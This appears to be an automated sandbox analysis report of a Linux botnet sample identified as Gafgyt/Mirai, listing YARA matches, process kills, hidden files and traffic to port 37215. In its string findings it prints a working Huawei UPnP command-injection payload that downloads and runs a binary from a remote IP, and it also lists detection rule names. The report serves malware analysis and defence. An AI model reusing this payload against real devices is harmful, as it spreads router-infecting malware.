Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: @/proc/net/tcpsshdtelnetdsystemddaemonbashsbin/fd//proc/watchdog<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 802, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1480, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1482, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1604, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1748, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1751, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1755, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1765, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1804, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1832, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1866, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1875, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1879, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1881, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1891, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1906, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1921, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1922, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1925, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1930, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1940, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1946, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1969, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1982, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2926, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2972, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2974, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3095, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3104, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3117, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3122, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3161, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3162, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3163, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3164, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3165, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3170, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3182, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3208, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3209, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3212, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3225, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3246, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3300, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3327, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3336, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3342, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3375, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3413, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3420, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3424, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3429, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3434, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3448, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3631, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5458, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5460, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5462, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5499, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5503, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5504, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5507, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5523, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5539, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5540, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5544, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5546, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5566, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5605, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5611, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5613, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5614, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5615, result: successful	Jump to behavior

Yara signature match

Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal92.spre.troj.linELF@0/1@1/0

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /bin/fusermount (PID: 5511)

File: /proc/5511/mounts

Jump to behavior

Creates hidden files and/or directories

Source: /usr/lib/upower/upowerd (PID: 5462)	Directory: <invalid fd (12)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5462)	Directory: <invalid fd (11)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5507)	Directory: <invalid fd (9)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5507)	Directory: <invalid fd (8)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5657)	Directory: <invalid fd (12)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5657)	Directory: <invalid fd (11)>/..	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.config	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48862
Source: unknown	Network traffic detected: HTTP traffic on port 38244 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36676 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36676
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38324 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 38324
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36882
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40152 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32890 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34970 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 40728
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39724 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34342 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34342
Source: unknown	Network traffic detected: HTTP traffic on port 45022 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36320 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215

Stealing of Sensitive Information

Yara detected Gafgyt

